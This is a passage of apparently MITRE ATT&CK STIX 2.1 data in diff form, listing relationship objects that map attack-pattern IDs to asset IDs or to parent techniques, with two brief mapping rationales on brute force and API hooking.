"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99b0fc66-2d6b-4b2b-a180-6ad0ad7dbdc6", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99de31d2-8451-4883-a50f-b3b7a8cea75f", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99f84b91-32a1-4ade-8de5-5d2a0359302f", + "created": "2023-09-28T19:56:54.642Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:56:54.642Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99fa6d92-0c41-44ed-bd30-dd0413785883", + "created": "2023-09-29T18:43:23.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:43:23.321Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99fb038f-f3c5-4bac-ada4-38997063af53", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a0fb4a7-3f21-46b8-9e6f-1a6828b0e4ee", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a2c6f48-64fd-4d4e-8907-ed1f956bc2e0", + "created": "2024-06-26T15:31:43.082Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:31:43.082Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a3e771d-d84f-4f2a-baf9-4478abdbdbcf", + "created": "2023-09-28T20:04:32.626Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:04:32.626Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a40aa7f-7e12-4437-a23d-ce580b651272", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a53b05c-b029-410e-99df-cdea3ca06462", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a6fd20e-1ad8-4928-be92-ff3a73e2bdad", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a8679b7-9845-45e8-a7d8-86f06b27a8c8", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a87d81e-4197-433a-bb71-35d69d695434", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9a8d90e7-e69d-417d-a767-18b2e26b0582", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9aae6d20-8645-4cd5-a0b3-d95676a4cd0a", + "created": "2024-05-22T17:21:03.737Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:54:12.091Z", + "description": "Asset Mapping Rationale: Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ab2a8ed-7c69-4c47-b6ff-8ebd5115d761", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9acea9fd-5c35-4956-b048-4e22dad5a044", + "created": "2020-10-02T16:37:30.083Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9adbb65c-b8cc-491a-924b-d506af645d44", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ae78e80-ebb6-4aa8-892c-79622fe962d2", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9af1815a-7e79-458d-a0e7-5574aa2a4b93", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9af1f7b6-d914-4916-9fee-e8ca0e9c8109", + "created": "2020-03-13T20:21:54.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9afc05bf-7b1c-422d-ace5-7c8414285946", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b0b3c25-d87c-452a-a2f9-241234410eb8", + "created": "2023-09-29T18:58:05.958Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T02:56:28.394Z", + "description": "Asset Mapping Rationale: Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b1e06fa-be76-4bf5-86d4-62c8e7bf02f8", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b210583-ec64-4a9b-a580-b8f6b50bb043", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b25dee0-3045-45b2-b4f5-c6eb0d1225d0", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b318742-5f7e-4754-b0ea-8d18c01bb9d7", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b31e5a4-6a04-4a95-9706-ef4d69988160", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b645b86-9b9d-4268-bb56-f9ebbc3c78f8", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b6ee60f-67fc-4c00-87fe-8103d938aaac", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9b72f375-4a14-4ae7-9b0b-1202ba3d6970", + "created": "2020-03-02T14:22:24.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ba76ea3-9ebb-49d7-803a-5cf2deef6875", + "created": "2023-09-28T19:37:35.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:37:35.485Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ba97a0a-1ae5-4969-9ce4-6fb86d70fae0", + "created": "2020-03-06T20:57:38.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9bb414b3-ed40-44e3-9766-fdcceabf2bd4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9bbad839-fc09-488d-ab19-97a3d354fa29", + "created": "2023-05-24T19:03:05.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-05-24T19:03:05.238Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9bd7222e-6ff8-4cf9-8683-0d1deffde8a2", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9bdaecbf-6e80-4797-ab4e-2f602eab1797", + "created": "2024-06-26T14:48:07.874Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:48:07.874Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9be50d17-0bf4-4eda-b7d1-7238c6d8b446", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": 